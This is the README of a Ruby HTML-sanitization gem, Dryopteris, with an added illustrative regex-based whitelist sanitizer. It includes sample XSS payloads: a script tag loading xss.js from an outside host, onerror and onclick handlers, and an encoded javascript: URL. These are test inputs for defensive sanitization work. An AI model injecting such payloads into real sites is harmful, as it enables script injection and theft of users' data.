queso / dryopteris forked from brynary/dryopteris

HTML sanitization using Nokogiri


Dryopteris

Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.

Usage

Let's say you run a web site, and you allow people to post HTML snippets.

Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Oooh, that could be bad. Here's how to fix it: run the snippet through the sanitizer before you store or render it. Anything not on the whitelist, the `<script>` element included, is dropped:

    safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)

Yeah, it's that easy.
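To show what a whitelist sanitizer actually does with that snippet (and with the sneakier variants a script-kiddie tries next), here is an added example. It is not Dryopteris's code and does not use Nokogiri: Dryopteris hands the markup to Nokogiri/libxml2 and walks a real parse tree, whereas this stand-in tokenizes tags with a small regular expression so it runs with nothing but the Ruby standard library. The `WhitelistSanitizer` module, its tag and attribute lists, and the URL scheme check are all hypothetical, a small subset of what an HTML5-derived whitelist would allow.

```ruby
require 'strscan'
require 'cgi'

# Added illustration of whitelist-based sanitization; NOT Dryopteris's own
# code. Dryopteris parses with Nokogiri/libxml2; this stand-in uses a small
# tag tokenizer so it runs with no gems. Whitelists below are hypothetical.
module WhitelistSanitizer
  ALLOWED_TAGS    = %w[a b br em i img li ol p strong ul].freeze
  ALLOWED_ATTRS   = { 'a' => %w[href title], 'img' => %w[src alt] }.freeze
  URL_ATTRS       = %w[href src].freeze
  ALLOWED_SCHEMES = %w[http https mailto].freeze
  # Elements whose *content* is dangerous too: drop them and everything inside.
  PRUNE_TAGS = %w[script style].freeze

  TAG_RE  = %r{</?([A-Za-z][A-Za-z0-9]*)([^>]*)>}
  ATTR_RE = /([A-Za-z][A-Za-z0-9:\-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/

  # Returns a sanitized copy of +html+: tags not on the whitelist are stripped
  # (their text is kept), PRUNE_TAGS vanish together with their content, and
  # every text node is re-escaped on the way out.
  def self.sanitize(html)
    out = +''
    s = StringScanner.new(html)
    prune_depth = 0
    until s.eos?
      if s.scan(TAG_RE)
        tag_src, name, attrs_src = s[0], s[1].downcase, s[2]
        closing = tag_src.start_with?('</')
        if PRUNE_TAGS.include?(name)
          prune_depth += closing ? -1 : 1
          prune_depth = 0 if prune_depth.negative?
        elsif prune_depth.zero? && ALLOWED_TAGS.include?(name)
          out << (closing ? "</#{name}>" : "<#{name}#{clean_attrs(name, attrs_src)}>")
        end
      else
        # Text node, or a stray '<' that is not a tag: decode entities the way
        # a parser would, then encode again so nothing reaches the page raw.
        text = s.scan(/[^<]+/) || s.getch
        out << CGI.escapeHTML(CGI.unescapeHTML(text)) if prune_depth.zero?
      end
    end
    out
  end

  # Keeps only attributes whitelisted for this element; URL-valued ones must
  # also pass safe_url?. Values are decoded, checked, then re-escaped.
  def self.clean_attrs(name, attrs_src)
    allowed = ALLOWED_ATTRS.fetch(name, [])
    kept = +''
    attrs_src.scan(ATTR_RE) do |attr, dq, sq, bare|
      attr = attr.downcase
      next unless allowed.include?(attr)
      value = CGI.unescapeHTML(dq || sq || bare || '')
      next if URL_ATTRS.include?(attr) && !safe_url?(value)
      kept << %( #{attr}="#{CGI.escapeHTML(value)}")
    end
    kept
  end

  # Relative URLs are fine; absolute ones must use a whitelisted scheme.
  # Whitespace and control characters are removed before the check because
  # browsers ignore them inside a scheme ("java\tscript:" still executes).
  def self.safe_url?(value)
    compact = value.downcase.gsub(/[\x00-\x20]/, '')
    scheme = compact[/\A([a-z][a-z0-9+.\-]*):/, 1]
    scheme.nil? || ALLOWED_SCHEMES.include?(scheme)
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: the README's payload plus a few classic variants.
  [
    '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>',
    '<p onclick="evil()">Hi <b>there</b> &amp; <3</p>',
    '<a href="&#106;ava&#9;script:alert(1)">x</a>',
    '<img src=x onerror=alert(1)>'
  ].each { |html| puts "#{html.inspect} => #{WhitelistSanitizer.sanitize(html).inspect}" }
end
```

Two details carry over directly to a Nokogiri-backed sanitizer such as Dryopteris: attribute values must be decoded before the scheme check (otherwise `&#106;avascript:` slips past a naive prefix test), and `<script>`/`<style>` must be pruned with their content rather than merely stripped, or the script text lands on the page as visible junk. The hand-rolled tokenizer is only for illustration; for real input, let libxml2 do the parsing, as Dryopteris does.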

Standing on the Shoulders of Giants

Dryopteris uses Nokogiri and libxml2, so the markup is parsed by a real HTML parser rather than regular expressions, and it's fast.

Dryopteris also takes its tag whitelist, its tag attribute whitelist and its CSS sanitizer directly from the HTML5 sanitizer rather than inventing its own.